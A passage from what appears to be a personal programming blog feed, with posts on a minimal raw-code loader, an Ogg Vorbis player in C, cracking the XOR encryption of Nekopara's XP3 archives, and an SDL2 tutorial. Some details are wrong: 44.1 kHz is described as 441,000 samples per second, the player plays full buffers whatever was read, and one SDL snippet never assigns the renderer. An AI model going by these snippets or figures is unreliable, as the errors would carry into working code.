It's a structured format, not much different than your typical PNG or Ogg file, containing some machine code instructions and directives for how the program should be loaded into memory. The task of parsing the binary and actually loading it is done by a <strong>loader</strong>, though that's a pretty broad term. My favorite book on this subject, <em>Linkers and Loaders</em> by John R. Levine, defines a loader as a program to "copy a program from secondary storage (which since about 1968 invariably means a disk) into main memory so it's ready to be run. In some cases loading just involves copying the data from disk to memory, in others it involves allocating storage, setting protection bits, or arranging for virtual memory to map virtual addresses to disk pages."</p> <p class="indent">Loaders are everywhere, as you can probably imagine. Maybe you've heard of a boot loader; those are for getting a kernel into memory from the strange and unfamiliar land of x86 real mode. Whenever you run a program on Linux, it's loaded by the kernel's ELF loader, of which you can find the source code for at <a href="https://github.com/torvalds/linux/blob/master/fs/binfmt_elf.c">fs/binfmt_elf.c</a> of the kernel source tree. On a higher level, something like Java has a class loader for getting bytecode into memory so that the JVM can run it.</p> <p class="indent">As our first step into the world of loaders, we'll write our own. A very basic one, at that. I think that because we're taking a look at how much information can be stored inside of a binary, we should begin with the absolute minimum. It won't use a structured format, and won't set up memory beyond the stack and a page for executable code, but not at a specified address of any sort. Where that code exists in memory isn't known to the program, and it only really knows where the stack is from the %rsp register. We'll simply load some machine code from a file, and execute it. I'll spare you the per-line explanation I usually give, since it's reasonably simple and the only part you might not understand already is explained through comments.</p> <pre><code>#include &lt;sys/mman.h&gt; #include &lt;sys/stat.h&gt; #include &lt;stdio.h&gt; size_t binary_size(FILE *); int main(int argc, char **argv) { FILE *fp; void *exe; size_t exe_size; void (*jump)(void); if (argc != 2 || (fp = fopen(argv[1], "rb")) == NULL) { fprintf(stderr, "USAGE: %s [FILE]\n", argv[0]); return 1; } if ((exe_size = binary_size(fp)) == 0) { return 1; } /* Because writable memory pages are marked as non-executable by default, we need to map a new page of memory for our executable code. We do this by invoking the "mmap" syscall, and getting a new page from the kernel. */ exe = mmap(NULL, exe_size, PROT_WRITE | PROT_EXEC, MAP_SHARED | MAP_ANONYMOUS, -1, 0); if (exe == MAP_FAILED) { fprintf(stderr, "mmap failure.\n"); return 1; } fread(exe, exe_size, 1, fp); jump = exe; jump(); munmap(exe, exe_size); fclose(fp); return 0; } /* We'll use some POSIX standard functions because we can and they're generally safer than fseek and ftell. */ size_t binary_size(FILE *fp) { struct stat buf; if ((fstat(fileno(fp), &amp;buf) != 0) || (!S_ISREG(buf.st_mode))) { return 0; } return buf.st_size; } </code></pre> <p class="indent">Looks good! We can't use any of the binaries on our system to test it out, though. They're in some structured format like ELF and the header would be interpreted as code -- probably causing a segmentation fault. Even if it got past the header without a core dump, the binary probably relies on some absolute addressing that we didn't set up properly. So instead of running /bin/ls through our program, we'll assemble "hello world."</p> <pre><code> leaq (%rip), %rax addq $_msg_end - ., %rax jmpq *%rax _msg: .ascii "Hello, world!\n" _msg_end: movq $0x01, %rax movq $0x01, %rdi leaq (%rip), %rsi subq $. - _msg, %rsi movq $0x0e, %rdx syscall ret </code></pre> <p class="indent">What you'll probably notice immediately is that we're forced to write a position-independent executable. As I mentioned earlier, our loader can't handle absolute addresses. It can't really handle anything, aside from the most simple of x86 instructions. We do a <code>ret</code> at the very end to return control to the loader. Nothing left to do now but test it out:</p> <pre><code>[jakob@Epsilon ~]$ ./a.out test.bin Hello, world! </code></pre> <p class="indent">test.bin is 64 bytes and takes 0.001s to load and run. I probably could have made the program smaller, but I think it's a perfectly fine benchmark as we continue through this series. Keep in mind that 64 bytes is only achievable because we forget the conveniences of modern loaders. We can only run position-independent code, there's no separation between data and code segments, no room for debugging symbols, no write protection on the code segment, nothing. This is perhaps the most stripped down loader you can get.</p> Making Your Own Music Player: A Gentle Introduction to Audio Programming http://jakob.spaceMaking+Your+Own+Music+Player%3A+A+Gentle+Introduction+to+Audio+Programming http://jakob.spaceMaking+Your+Own+Music+Player%3A+A+Gentle+Introduction+to+Audio+Programming Sat, 15 Jul 2017 18:56:34 EST <p class="indent">To start off, I'd like to say that I know very little about audio programming and digital audio in general. I've never formally studied signal processing, and hell, I haven't even started high school physics yet. This post merely documents what I've learned while trying to get sound working in my game, because there aren't really any other learning resources about this out there.</p> <p class="indent">In this tutorial, we'll write a basic music player for Ogg Vorbis in C using two awesome libraries from Xiph.Org. The first, libao, will provide us with a means to play sound through our speakers, or headphones. or whatever, and we'll use libvorbisfile to decode the Ogg Vorbis files.</p> <p class="indent">libao, like most other audio libraries, works by giving us a <em>PCM buffer</em> that we write sound data to, and that gets played back. <em>PCM</em> stands for Pulse-Code Modulation, and it's the basis of digital audio programming. You might have heard people talk about how analog audio is so much better than digital, and I think that learning the difference between the two helps to better understand digial audio. Historically, sound was recorded in terms of analog signals, which were easy to store as something like field strength on a magnetic medium. However, digitizing audio requires the signal to be either sampled or quantized. Both techniques are fairly similar, basically getting an instantaneous representation of the signal some number of times a second. The image below does a good job of explaining it, I think.</p> <p><img src="/img/Audio_Programming_1.png" alt="Analog vs Digital Audio"></p> <p class="indent">The rate at which the signal is sampled or quantized is the <em>frequency</em>. 44.1 kHz is typically the standard - meanining that 441,000 samples are taken every second. The number of <em>channels</em> is essentially how many speakers the sound is meant for. Stereo sound is the standard, so that is typically 2. And finally, the audio can be 8, 16, 24, or 32 bit, representing the size of the integer used to represent the sample.</p> <p>Before we get into the code; you might need to configure libao if you're using PulseAudio. Just open it up in your favorite editor and change it as shown below.</p> <pre><code>$ sudo $EDITOR /etc/libao.conf # Change from default_driver=alsa dev=default # To default_driver=pulse # Make sure to remove the dev=default line </code></pre> <p>Now we're ready to get into the code. We'll include the headers for libao and libvorbisfile, as well as some standard library headers and the size of the PCM buffer, which I'll explain soon.</p> <pre><code>#include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;ao/ao.h&gt; #include &lt;vorbis/vorbisfile.h&gt; #define BUF_SIZE 256 </code></pre> <p class="indent">The program is actually simple enough that we can do everything in main. For clarity, I'll be using C99 variable declaration. Our program will take the file to play as a command-line argument, so the first thing we need to do is check argc.</p> <pre><code>if (argc != 2) { fprintf(stderr, "Usage: %s [PATH]\n", argv[0]); return 1; } </code></pre> <p>Next, we'll initialize libao. We'll also get the ID of the default sound driver for when we open an audio device later.</p> <pre><code>ao_initialize(); int default_driver = ao_default_driver_id(); </code></pre> <p class="indent">Now, we'll specify the output format we want. This is what we were talking about earlier, about frequency and channels and such. The only part of this that wasn't mentioned was format.byte_format, which is just the byte order of the PCM buffer. The Vorbis decoder will work with either big or little endian, but we'll just stick with little endian for simplicity.</p> <pre><code>ao_sample_format format = {0}; format.bits = 16; format.channels = 2; format.rate = 44100; format.byte_format = AO_FMT_LITTLE; </code></pre> <p>We'll use this format structure to open an audio device with the default sound driver we figured out earlier.</p> <pre><code>ao_device *device = ao_open_live(default_driver, &amp;format, NULL); if (device == NULL) { fprintf(stderr, "Error opening device\n"); return 1; } </code></pre> <p class="indent">And now, we'll get our PCM buffer. Some audio libraries have a routine to give you a a buffer, but libao is alright with us using pretty much anything, so we'll allocate it with malloc. At this point, maybe you're wondering why we use a buffer. While we <em>could</em> read and play one byte at a time, that can be very inefficient. It's better to read it into a buffer, and then play that buffer. You don't want it to be too large, though, as there will be a longer pause every time the buffer has to be read into. You also don't want it to be too small. I find that 256 is good enough, but you can tweak that to your needs. The size should be a power of two.</p> <pre><code>char *buf = malloc(BUF_SIZE); if (buf == NULL) { fprintf(stderr, "Error allocating PCM buffer.\n"); return 1; } </code></pre> <p class="indent">Now, we'll initialize libvorbisfile, which is done by opening the file we want to play. This huge switch statement isn't necessary, it's just there to show all the possible status codes of ov_fopen. Checking for a status code of 0 would be just fine here.</p> <pre><code>OggVorbis_File vf; switch (ov_fopen(argv[1], &amp;vf)) { case OV_EREAD: fprintf(stderr, "Couldn't open %s.\n", argv[1]); return 1; case OV_ENOTVORBIS: fprintf(stderr, "File contains no vorbis data.\n"); return 1; case OV_EVERSION: fprintf(stderr, "Vorbis version mismatch.\n"); return 1; case OV_EBADHEADER: fprintf(stderr, "File contains a bad bitstream header.\n"); return 1; case OV_EFAULT: fprintf(stderr, "Failure induced by heap/stack corruption.\n"); return 1; } </code></pre> <p>The real meat and potatoes of the program comes next. A loop that continually reads data into our PCM buffer and plays it, until there's no more data to play.</p> <pre><code>int read, bitstream; do { read = ov_read(&amp;vf, buf, BUF_SIZE, 0, 2, 1, &amp;bitstream); ao_play(device, buf, BUF_SIZE); } while (read &gt; 0); </code></pre> <p class="indent">The random integer constants in the call to <code>ov_read</code> might be a bit intimidating, but it's really nothing to worry about. The first parameter is whether or not the PCM buffer is big endian (which it is not, so we pass 0), the second is the sample size, where 2 represents 16-bit, and the third is whether or not the data is signed. You can read more about it in <a href="https://xiph.org/vorbis/doc/vorbisfile/ov_read.html">the documentation</a>.</p> <p class="indent">Hopefully, things are starting to click around now. Any sound that comes out of your speakers is just a bunch of numbers, and file formats like Ogg and MP3 are just a means of compressing those numbers.</p> <p>And finally, we'll finish up with some cleanup.</p> <pre><code>free(buf); ov_clear(&amp;vf); ao_close(device); ao_shutdown(); return 0; </code></pre> <p>Compilation is pretty easy, too.</p> <pre><code>$ gcc -o oggplay oggplay.c -lvorbisfile -lao </code></pre> <p>Pretty painless, right? Without error handling, this is about 21 lines of code.</p> <p>Go ahead, try it out! If you don't save your music as Ogg Vorbis, you can convert songs with ffmpeg:</p> <pre><code>$ ffmpeg -i [file] -c:a libvorbis song.ogg </code></pre> <p>Here are some exercises if you want to play with this more:</p> <ul> <li>Get the frequency from the file being played, rather than hardcoding it at 44.1 kHz. Check out the <a href="https://xiph.org/vorbis/doc/vorbisfile/reference.html">file Information section of the documentation</a>.</li> <li>Add a status line showing the current timestamp.</li> <li>Watch <a href="https://www.youtube.com/watch?v=pFgui9uGmr4">this talk from SIGINT13</a>.</li> <li>Play two sounds at once by adding their PCM values. Keep in mind that 8-bit and 16-bit integers overflow quite easily.</li> <li>Learn the library for another audio codec/container, like libopenmpt for classic tracker music.</li> <li>If you're feeling particularly up to a challenge, try rewriting the player using just libvorbis and libogg, rather than libvorbisfile.</li> </ul> Reverse Engineering Babby's First Archive Format http://jakob.spaceReverse+Engineering+Babby%27s+First+Archive+Format http://jakob.spaceReverse+Engineering+Babby%27s+First+Archive+Format Thu, 2 Mar 2017 15:25:09 EST <p class="indent">About two months have passed since the first release of Nekopack - a tool I wrote for extracting game data from Nekopara's XP3 archives. While the process wasn't an amazing reverse-engineering war story that will keep you on the edge of your seat, I feel it deserves a small blog post explaining how I did it. Additionally, there's no real documentation on the XP3 format as far as I'm aware, so hopefully this post will serve as an informal specification.</p> <p class="indent">The first step I took was to see if anyone else had tried to reverse it. Even something as simple as a writeup would have made my goal significantly more attainable. The closest thing I was able to find was <a href="https://github.com/vn-tools/arc_unpacker">Arc Unpacker</a>, a tool capable of extracting several archive formats, including XP3. However, attempting to use it brought to my attention the fact that Nekopara's archives are encrypted. Further searching yielded nothing of interest, so it seemed that the solution was to write a tool of my own. I chose to write it from scratch, as I couldn't predict how complex the encryption algorithm would be.</p> <p class="indent">Writing a tool to work with an archive format, however, requires a very thorough understanding of how it's structured. Instinctively, I fired up my favorite hex editor and went at it, with the <a href="https://github.com/vn-tools/arc_unpacker/blob/master/src/dec/kirikiri/xp3_archive_decoder.cc">source code of Arc</a> open to figure out most of it.</p> <p><img src="/img/Nekopack_1.png" alt="Hex view of the XP3 header"></p> <p class="indent">The first section of the archive is the header. It begins with an 11-byte "magic number," used by whatever program is opening it as a sanity check. It's followed by a 64-bit offset which, for XP3 version 2, points to a few adjacent values. First, an 8-bit integer that I've been told acts as a flags variable, followed by a 64-bit integer representing the table's size, and finally another 64-bit integer containing an offset to the beginning of the table section. The flags variable, to my knowledge, should have the 0x80 bit set; it's a constant defined in the code of the KiriKiriZ engine that I presume marks compatibility with the game engine. Byte 0x13 is a 32-bit unsigned integer representing the version, where a value of 1 represents version 2 of the archive.</p> <p>The header can be represented as the following C struct.</p> <pre><code>struct header { char magic[11]; uint64_t info_offset; uint32_t version; uint64_t table_size; uint8_t flags; uint64_t table_offset; }; </code></pre> <p class="indent">Seeking to the table, we find that it starts with some metadata. First, an 8-bit unsigned integer representing whether or not the contents of the archive are compressed. That's followed by a 64-bit unsigned integer representing the compressed size of the table, and another 64-bit unsigned integer representing the decompressed size. The table's contents are compressed using LZ77 and Huffman Coding, so let's use zlib! I proceeded to inflate the archive contents according to the header and dumped it so that I could view it in my hex editor.</p> <p><img src="/img/Nekopack_2.png" alt="Binary dump"></p> <p class="indent">Every entry has a header containing a 32-bit magic number (underlined in red), followed by a 64-bit unsigned integer representing the size of the entry. It's a very simple format to parse. This very first entry, 0x656c6946, is an "eliF" entry. It contains a UTF-16LE encoded filename and a "key", which is used to associate the eliF entry with its corresponding File entry. That key is also used when decrypting the file, but we'll get into that later on.</p> <p class="indent">The next visible chunk is a "File" entry. There's a lot in it, so it's broken up into several parts: "info", "segm", "adlr", and "time." The adlr chunk is pretty small and contains only the key, used to match the File entry to an eliF entry. The time chunk is also pretty small, containing a UNIX timestamp for the file creation date. What's a little more interesting are the two remaining chunks. segm has offsets to the beginning of the file, and it can actually contain several "segments." The file chunks specified in segm are also compressed with LZ77 and Huffman Coding. info contains a flags variable, a compressed and decompressed size, and what seems to be an MD5 hash of the file.</p> <p><img src="/img/Nekopack_3.png" alt="Basic parsing"></p> <p class="indent">Now we run into the problem of the files' contents being encrypted. I began by getting a debugger setup going to reverse engineer the binary. x64dbg isn't my usual choice, especially not with Intel syntax, but it was the first thing I was really able to get working. Of course, using the debugger alone is a little primitive. We have other tools to make reverse engineering easier.</p> <p><img src="/img/Nekopack_4.png" alt="Catching file reads"></p> <p class="indent">Enter procmon. It's reminiscent of strace, but it's meant for Windows and has a nice stack trace feature which helps us to locate the code that decrypts the archive. This is the point where I got stuck, having to deal with threads. It was mostly "guns blazing" debugging. I stepped through the code mindlessly for a few days, until one night before going to bed when I decided to take another look online for whether or not someone had cracked it yet. Then I found <a href="https://bitbucket.org/SmilingWolf/xp3tools-updated">something interesting</a>.</p> <p class="indent">It felt a little too easy, but I already wrote the unpacking part - so I wrote code to decrypt buffers and copied the encryption keys into my code. Encryption is symmetric and extremely simple, just single-key xor. A base key is first derived by xoring the game's master key with the file key I mentioned earlier. Then a one-byte key is derived from that key by xoring each byte. For some games the least significant byte of the base key is used to encrypt the first byte of the file. The game has default values to fall back to if either of those keys are too simple.</p> <p class="indent">Since the script I found only had the keys for volumes 1 and 0, I decided to try to get the key for volume 2 on my own. But now that I know the encryption algorithm used, I can break it without having to disassemble the game.</p> <p class="indent">It's pretty simple. Most binary files have a "magic number" associated with them, which allows us to perform a known-plaintext attack. Pair that with the fact that the first byte of each file is encrypted with the least-significant byte of the base key, and you've got yourself a cracking process simple enough to do in <a href="https://github.com/TsarFox/nekopack/blob/master/other/find_key.py">about 100 lines of python</a>.</p> SDL Tutorial Part 0x00 - Boilerplate, Windowing and Rendering http://jakob.spaceSDL+Tutorial+Part+0x00+-+Boilerplate%2C+Windowing+and+Rendering http://jakob.spaceSDL+Tutorial+Part+0x00+-+Boilerplate%2C+Windowing+and+Rendering Sun, 14 Aug 2016 21:02:56 EST <p class="indent">This is one of my older tutorials and follows a style unlike my current one. I also no longer hold the same claims I made about the SDL documentation that I originally made in this article. I think it's perfectly fine, you just need to spend some time looking around because it's not organized like other documentation is. For that reason, I have no plans to continue this tutorial series unless someone specifically asks for me to continue it.</p> <p class="indent">SDL2 is my favorite graphics library right now. It might not be as powerful as something like raw OpenGL, but it's simple. Simple enough that you can just pick it up and start using it. There's a glaring issue with it, though. The documentation is horrible. Absolutely horrible. A lot of it is unfinished, and it doesn't look like it's getting attention any time soon. The SDL1.2 documentation wasn't as bad, but that version of the library is vastly outdated by today's standards. So here's my take on a tutorial for SDL - part 0x00 of a I-don't-know-how-long-I'm-going-to-drag-this-on series. My examples are going to be written in C, because the constructs I show here can still be used verbatim in C++ (and probably SDL's other language bindings as well). This tutorial will be covering the little boilerplate that SDL requires, as well as the basics of windowing and rendering. Let's get into it.</p> <p class="indent">The first thing you have to worry about is installing and setting up SDL2.0. I won't cover it in detail because it's something you should be able to figure out yourself. If your operating system doesn't provide a means of package management, you should be able to find a download on the <a href="https://libsdl.org/">official website</a>.</p> <p class="indent">You should also figure out how to link SDL2 when you're compiling, nothing I teach here will work if it isn't properly linked. If you're having trouble with anything, fire up your favorite search engine or feel free to <a href="http://tsar-fox.com/">contact me</a>.</p> <p class="indent">Alright, assuming you've successfully installed SDL, let's get to actually programming. As with any C library, the first thing you should worry about is including the header files. While SDL provides header files for specific subsystems, we're not going to worry about that right now. There's a header file that contains everything and we're going to use that for right now.</p> <pre><code>#include &lt;SDL2/SDL.h&gt; </code></pre> <p>Depending on how header files are organized on your system, you may have to use this instead:</p> <pre><code>#include &lt;SDL.h&gt; </code></pre> <p class="indent">That will give us function prototypes and type definitions for everything in the SDL library, but we have to initialize SDL before we can really do anything with it. This is actually really simple, done with a single function call.</p> <pre><code>SDL_Init(SDL_INIT_VIDEO); </code></pre> <p class="indent">SDL_Init takes a flag as a parameter so it knows which subsystems to initialize. <em>A</em> parameter. One, not several. This might be a bit confusing to some, especially if you're not familiar with bitwise arithmetic, but SDL_INIT_VIDEO is nothing more than a preprocessor macro representing some number. SDL_Init interprets that number, and initializes the subsystems associated with it. We don't write the number out in our code, though (or at least you shouldn't). We use the macros, but there aren't macros for every combination of subsystems you can come up with. Does this mean that SDL can only initialize one subsystem at a time? Not at all, to combine macros and represent multiple subsystems, you would hook them together with the <a href="https://en.wikipedia.org/wiki/Bitwise_operation#OR">bitwise OR operator</a>. (|, not ||). For example, if we wanted to initialize SDL's video AND audio subsystems, we would do this</p> <pre><code>&lt;pre&gt;SDL_Init(SDL_INIT_VIDEO | SDL_INIT_AUDIO); </code></pre> <p>But we're not going to be working with audio just yet.</p> <p class="indent">SDL_Init also returns an integer value, and it's pretty important. If it's zero, SDL was initialized properly. Great! But if SDL can't be initialized for some reason, it will return a negative number. This is where another SDL function comes into the picture. SDL_GetError takes no arguments, but will return a string literal explaining what went wrong. So if we wanted to do some error checking (which you always should), we could do this:</p> <pre><code>if (SDL_Init(SDL_INIT_VIDEO)) { fprintf(stderr, "Here's the error: %s\n", SDL_GetError()); return 1; } </code></pre> <p>You can pretty much do anything here to handle the error. I'm using fprintf for simplicity, but SDL provides more advanced logging features which I'll cover in a later tutorial.</p> <p class="indent">In SDL, you need to be responsible and clean up after yourself. For every function that initializes or creates something, there is a complementary function that deinitializes or destroys it. The function to counter SDL_Init is SDL_Quit. It takes no parameters and returns nothing, you can just call it and be done with it. With that covered, we've learned SDL's few lines of boilerplate code. Much more appealing than something like Direct3D, eh? If you compile and run the program right now, nothing interesting will happen. It initialized and deinitialized SDL (unless something went wrong), but didn't bother creating windows or doing anything because we didn't tell it to. Let's change that. We first have to know about two important typedefs in SDL. <strong>SDL_Window, and SDL_Renderer.</strong> SDL_Window is self-explanatory, it's a struct representing a window, and SDL_Renderer is how you would put something into a window. Renderers in SDL are capable of hardware acceleration and vertical-sync, which is why SDL2 is awesome and SDL1.2 is left in the dust. These are just structs, though, they don't do anything by themselves. Let's create a window, and capture it in a SDL_Window struct:</p> <pre><code>SDL_Window *my_cool_window = SDL_CreateWindow("A Cool Window", SDL_WINDOWPOS_UNDEFINED, SDL_WINDOWPOS_UNDEFINED, 400, 400, SDL_WINDOW_SHOWN); </code></pre> <p class="indent">Whoa, that's a mouthful, but it isn't as complicated as it looks. The first argument is just a title for the window; you can name it whatever you want. The next two arguments are X and Y values for where the window should be placed on the screen. People usually don't care about this; you can use SDL_WINDOWPOS_UNDEFINED if you don't. After that are the window's width and height. I'm choosing to make my window 400 by 400 pixels, but you can choose whatever size works best for your program. There are ways to change it later on, too. Finally, we get to a flag. Its usage is similar to the flag we used with SDL_Init, you use a bitwise OR to combine flags. We're not doing anything fancy just yet, though, so SDL_WINDOW_SHOWN on its own will suffice. It ensures that the window will be visible, rather than minimized.</p> <p class="indent">As you can hopefully tell from the example code above, SDL_CreateWindow returns a pointer of type SDL_Window. If a window cannot be created, though, it will return NULL. You should always do error checking, so throw something in to see if my_cool_window (or whatever you named your window variable) is NULL.</p> <pre><code>if (!my_cool_window) { fprintf(stderr, "Window couldn't be created. %s\n", SDL_GetError()); return 1; } </code></pre> <p class="indent">There's SDL_GetError again! He's our friend and you should be using him every time you do error checking.<br>Remember how I said that SDL has a complementary function to destroy anything that is created? This is no exception. SDL_DestroyWindow is very similar to SDL_Quit, but it takes a SDL_Window pointer as an argument.</p> <pre><code>SDL_DestroyWindow(my_cool_window); </code></pre> <p class="indent">It's sad to see him go, but we're done so we need to free the resources. At this point, you can compile and run the C source file. It still kinda sucks, though. When you run it, the window pops up and immediately goes away. One useful function is SDL_Delay. It might seem mundane now, but it will become quite important when we need to cap our program's framerate. It takes a number of milliseconds as a parameter and temporarily stops your program so that SDL and your computer can take a short break. Alright. So when we put that in our code (after the window creation but before the window destruction), compile, and run it, we get this:</p> <p><img src="/img/SDL_Tutorial_1.png" alt="A window on my screen"></p> <p class="indent">I'm running i3wm, so it will probably look slightly different for you, but we've finally got a window! It still sucks, though. It doesn't do anything, it doesn't even clear itself! Let's make it white and learn a little bit about renderers in SDL.</p> <p class="indent">If we want to do stuff within a window, we have two options. One is to create an SDL_Surface from the window and draw to the surface, which is the sucky legacy way of doing it so we're going to pretend that I didn't mention it, or you can create a SDL_Renderer, which we're going to do because it's so much more capable. We're going to use another SDL function call to create a renderer, and we'll capture it in a SDL_Renderer pointer:</p> <pre><code>SDL_Renderer *my_cool_renderer; SDL_CreateRenderer(my_cool_window, -1, SDL_RENDERER_ACCELERATED); if (!my_cool_renderer) { fprintf(stderr, "There was an error %s\n", SDL_GetError()); } </code></pre> <p class="indent">Alright, so clearly the first argument is the window we want to create a renderer for. The second is more complicated. It's the index of the driver to initialize, which you probably don't care too much about so you can just put -1 in there to have it use the first one that's available. The last is a flag, which you probably know so much about by now. Finally, as you can imagine, SDL_CreateRenderer returns NULL if a renderer cannot be created. This should all seem pretty familiar, it's the same format as creating a window - create a struct pointer to capture it, use a function call to create it, and do some basic error checking. Dead simple, and it just gets better from here.</p> <p>Once again, don't forget to clean up after yourself. The function to remove a renderer when you're done with it is SDL_DestroyRenderer. It just takes a SDL_Renderer pointer as an argument.</p> <p>Now we've got a renderer, but if we compile and run our code - the effect is the same because we haven't used it for anything. So let's change that and learn a little bit about drawing in SDL.</p> <p class="indent">Renderers in SDL have a color associated with them, which they use when drawing primitive geometry like lines and quadrilaterals. It doesn't affect textures, but you'll probably end up using primitive geometry at some point so it's good to know. SDL_SetRenderDrawColor changes the aforementioned color. We're actually not going to be drawing any primitive geometry in this tutorial, but I'm bringing this up because the renderer will use its associated color when clearing the screen. So more about the function - it takes a renderer as an argument, followed by red, green, blue, and alpha (transparency) values. I'm going to make mine white (0xFF, 0xFF, 0xFF, 0xFF), but feel free to experiment. After that, we'll be calling SDL_RenderClear, which takes a renderer as an argument and, as I briefly mentioned a few lines ago, fills it with whatever color the renderer is currently associated with. And finally, we'll call SDL_RenderPresent to update the screen. This is where some people get a little confused. Basically, in SDL you draw everything and <em>then</em> update the screen, meaning that you have as much time as you want to make the scene perfect before you have to show it to the user. And we're pretty much done! Let's look at the basic program:</p> <pre><code>#include &lt;stdio.h&gt; #include &lt;SDL2/SDL.h&gt; int main(int argc, char *argv[]) { SDL_Window *my_cool_window; SDL_Renderer *my_cool_renderer; if (SDL_Init(SDL_INIT_VIDEO)) { fprintf(stderr, "ERROR: %s\n", SDL_GetError()); return 1; } my_cool_window = SDL_CreateWindow("Bush Did Harambe", SDL_WINDOWPOS_UNDEFINED, SDL_WINDOWPOS_UNDEFINED, 400, 400, SDL_WINDOW_SHOWN); if (!my_cool_window) { fprintf(stderr, "ERROR: %s\n", SDL_GetError()); return 1; } my_cool_renderer = SDL_CreateRenderer(my_cool_window, -1, SDL_RENDERER_ACCELERATED); if (!my_cool_renderer) { fprintf(stderr, "ERROR: %s\n", SDL_GetError()); return 1; } SDL_SetRenderDrawColor(my_cool_renderer, 0xFF, 0xFF, 0xFF, 0xFF); SDL_RenderClear(my_cool_renderer); SDL_RenderPresent(my_cool_renderer); SDL_Delay(4000); SDL_DestroyRenderer(my_cool_renderer); SDL_DestroyWindow(my_cool_window); SDL_Quit(); return 0; } </code></pre> <p>Let's run it:</p> <p><img src="/img/SDL_Tutorial_2.png" alt="Finished window"></p> <p>To recap, we learned about:</p> <p><strong>SDL Functions</strong>:</p> <ul> <li><strong>SDL_Init</strong>: Used to initialize SDL. Takes a flag as a parameter. Returns 0 if it succeeds, or a negative value if it fails.</li> <li><strong>SDL_Quit</strong>: Complements SDL_Init. Takes no parameters and returns nothing.</li> <li><strong>SDL_CreateWindow</strong>: Creates a window and returns a pointer to it, or NULL if it fails. Takes a title, X and Y positions, width, height, and a flag as parameters.</li> <li><strong>SDL_DestroyWindow</strong>: Complements SDL_CreateWindow, takes a SDL_Window pointer as an argument and returns nothing.</li> <li><strong>SDL_CreateRenderer</strong>: Called to create a renderer, and returns a pointer to it, or NULL if it fails. Takes the SDL_Window pointer for the window you want to create a renderer for, an index (usually -1), and a flag as parameters.</li> <li><strong>SDL_DestroyRenderer</strong>: Complements SDL_CreateRenderer. Takes a SDL_Renderer pointer as an argument and returns nothing</li> <li><strong>SDL_Delay</strong>: Takes a number of milliseconds as an argument, and proceeds to wait for that period of time.</li> <li><strong>SDL_SetRenderDrawColor</strong>: Takes a renderer, red, green, blue, and alpha values as arguments, and changes the color associated with the given renderer.</li> <li><strong>SDL_RenderClear</strong>: Takes a renderer as an argument and fills it with whatever color is currently associated with that renderer.</li> <li><strong>SDL_RenderPresent</strong>: "Refreshes" the renderer, presenting the image to the user.</li> </ul> <p><strong>Type Definitions</strong>:</p> <ul> <li><strong>SDL_Window</strong>: Captures the result of SDL_CreateWindow.</li> <li><strong>SDL_Renderer</strong>: Captures the result of SDL_CreateRenderer.</li> </ul> <p>And if you would like to read more, here are some additional resources:</p> <ul> <li><a href="https://wiki.libsdl.org/SDL_Init#Remarks">SDL Documentation - SDL_Init (Remarks)</a></li> <li><a href="https://wiki.libsdl.org/SDL_WindowFlags">SDL Documentation - Window Flags</a></li> <li><a href="https://wiki.libsdl.org/SDL_RendererFlags">SDL Documentation - Renderer Flags</a></li> </ul> <p>You're still reading? Well, this is my first tutorial ever. If you have any feedback, be it positive or negative, I'd love to hear it! I hope this tutorial was helpful, there are many more to come.</p>